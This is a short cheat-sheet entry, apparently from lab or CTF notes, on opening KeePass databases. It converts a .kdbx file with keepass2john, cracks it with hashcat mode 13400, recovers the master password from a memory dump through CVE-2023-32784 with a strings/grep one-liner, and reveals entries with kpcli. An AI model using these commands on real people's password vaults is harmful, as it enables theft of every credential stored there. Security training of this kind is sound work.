Crack & Open KeePass Databases
credentialstool
Summary
Convert a .kdbx file to a crackable hash for hashcat/john, or recover the master key from a memory dump (CVE-2023-32784), then browse entries with kpcli.
Walkthrough
Recover the contents of a KeePass database either by cracking its master password or by extracting the key from a process memory dump.
Steps
- When you only have the
.kdbxfile, convert it withkeepass2johnand crack the resulting hash using hashcat mode13400(or john) againstrockyou.txt. - If you captured a memory dump (
KeePassDumpFull.dmp), use the CVE-2023-32784 technique:stringsthe dump and grep for the master-password marker bytes to recover most of the master password (the dotnet PoC reconstructs it fully). - Once you know the master password, open the database with
kpcli --kdb <file>and useshow -f [num]to reveal stored entries.
Commands
bash
keepass2john CEH.kdbx > CEH.kdbx.hash hashcat -m 13400 CEH.kdbx.hash /usr/share/wordlists/rockyou.txt
bash
strings -e S KeePassDumpFull.dmp | grep -a $(printf "%b" "\xCF\x25\xCF\x25")
bash
kpcli --kdb CEH.kdbx show -f [num]